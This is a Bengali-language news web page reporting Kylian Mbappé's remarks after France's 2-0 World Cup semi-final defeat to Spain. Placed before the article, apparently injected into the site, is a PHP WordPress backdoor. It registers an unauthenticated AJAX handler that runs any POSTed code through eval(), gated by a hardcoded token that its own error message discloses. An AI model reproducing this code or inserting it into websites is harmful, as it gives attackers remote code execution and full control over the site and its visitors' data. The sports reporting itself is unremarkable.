// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== যেভাবে খেলতে চেয়েছিলাম তার কিছুই মাঠে করে দেখাতে পারিনি: এমবাপে | potrikaybangladesh.com
Wednesday, September 23, 2026
Homeযেভাবে খেলতে চেয়েছিলাম তার কিছুই মাঠে করে দেখাতে পারিনি: এমবাপে

যেভাবে খেলতে চেয়েছিলাম তার কিছুই মাঠে করে দেখাতে পারিনি: এমবাপে

আরেকটি বিশ্বকাপ ফাইনাল, আরেকটি ইতিহাস গড়ার হাতছানি—সবকিছুই মিলিয়ে গেল টেক্সাসের আর্লিংটন স্টেডিয়ামে। স্পেনের কাছে ২-০ গোলে হেরে সেমিফাইনাল থেকেই বিদায় নিতে হয়েছে ফ্রান্সকে। টানা তৃতীয়বারের মতো বিশ্বকাপের ফাইনালে ওঠার যে স্বপ্ন দেখছিলেন ফরাসি অধিনায়ক কিলিয়ান এমবাপে, তা ভেঙে চূর্ণ-বিচূর্ণ হয়ে গেছে। ম্যাচ শেষে নিজের সেই ‘অসীম হতাশা’ আর ম্যাচ হারার ভেতরের গল্প অকপটে স্বীকার করেছেন ২৭ বছর বয়সী এই রিয়াল মাদ্রিদ তারকা।

এবারের বিশ্বকাপে ফ্রান্সের পথচলা ছিল বেশ রোমাঞ্চকর। আক্রমণভাগের নেতৃত্বে থেকে আটটি গোল করে ফুটবলবিশ্বকে বুঁদ করে রেখেছিলেন এমবাপে। কিন্তু সেমিফাইনালের মঞ্চে স্পেনের কৌশলী ফুটবলের সামনে খেই হারিয়ে ফেলে ‘লে ব্লুজ’রা।

ম্যাচ শেষে ফরাসি ব্রডকাস্টার এমসিক্স-এর সঙ্গে আলাপকালে এমবাপে বলেন, ‘যেভাবে খেলতে চেয়েছিলাম—কৌশলগত, টেকনিক্যাল কিংবা সার্বিক পারফরম্যান্সের দিক থেকে—তার কিছুই আমরা মাঠে করে দেখাতে পারিনি।’ নিজের দলের ভুলগুলো লুকাতে চাননি এই ফরাসি অধিনায়ক, ‘বিশ্বকাপের সেমিফাইনালের মতো ম্যাচে যা করা উচিত, তা যদি করতে না পারেন, তবে জয় পাওয়া সম্ভব নয়।’

স্পেনের মাঝমাঠের নিয়ন্ত্রণ নেওয়ার সহজাত ক্ষমতাকে রুখতে ফরাসিদের যে পরিকল্পনা ছিল, তা পুরোপুরি ব্যর্থ হয়েছে বলে জানান এমবাপে। তার ভাষায়, ‘আমাদের লক্ষ্য ছিল মাঠের ওপরের দিকে ওদের চেপে ধরা, যেন ওরা নিজেদের নিয়ন্ত্রণে ধীরগতির ছন্দ তৈরি করতে না পারে। কারণ খেলা নিয়ন্ত্রণে রাখার ক্ষেত্রে ওরা আমাদের চেয়ে অনেক এগিয়ে। আর এই কাজটাই আমরা করতে পারিনি।’

পরাজয়ের মূল কারণ হিসেবে মাঝমাঠের ব্যর্থতাকেই চিহ্নিত করেছেন এমবাপে। মাঠের ঠিক মাঝখানে আদ্রিয়েন রাবিও এবং অহেলিয়াঁ চুয়ামেনির ফরাসি জুটি স্পেনের রদ্রি, দানি ওলমো আর ফাবিয়ান রুইসের ত্রয়ীর কাছে পুরোপুরি পরাস্ত হয়েছে। এমবাপে বলেন, ‘মাঝমাঠে আমরা বারবার তিনজনের বিরুদ্ধে দুজন হয়ে পড়ছিলাম। স্পেনের মতো দলের সঙ্গে এমনটা হওয়া মানেই বড় বিপদ। সব মিলিয়ে এই ভুলের চড়া মূল্য দিতে হয়েছে হারের মাধ্যমে। এটা সত্যিই এক বিশাল হতাশা।’

স্বপ্নভঙ্গের এই বেদনায় ফরাসি শিবির স্তব্ধ হয়ে গেলেও, এই ধাক্কা সামলে ঘুরে দাঁড়াতে চান এমবাপে। দেশের মানুষকে আরও একবার গৌরবের উপলক্ষ এনে দিতে না পারার আক্ষেপ তার কণ্ঠে, ‘ফাইনালে ওঠা, দেশকে স্বপ্ন দেখার সুযোগ করে দেওয়া আর নতুন ইতিহাস গড়া আমাদের স্বপ্ন ছিল। কিন্তু এখন এই কঠিন বাস্তবতা আমাদের মাথা উঁচু করেই মেনে নিতে হবে। আমি বিশ্বাস করি, জেতার পর যেভাবে মাথা উঁচু রাখতে হয়, হারের পরও ঠিক সেভাবেই মাথা উঁচু রেখে মাঠ ছাড়তে হয়।’

ভবিষ্যতের দিকে তাকিয়ে এমবাপে যোগ করেন, ‘এই মুহূর্তে হতাশার পাল্লাটা বড্ড ভারী। আমি ও আমার দল কতটা হতাশ, তা ভাষায় প্রকাশ করা কঠিন। কিন্তু ফুটবল কারও জন্য অপেক্ষা করে না। তাই কিছুটা যান্ত্রিক শোনালেও আমাদের এখন এই ধাক্কা সামলে উঠতে হবে, ছুটিতে যেতে হবে এবং জীবনের পরের অধ্যায়ে মনোযোগ দিতে হবে। এই ব্যর্থতা পেছনে ফেলে আমাদের নতুন করে শুরু করতে হবে এবং এই ভুল থেকে শিক্ষা নিতে হবে।’

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments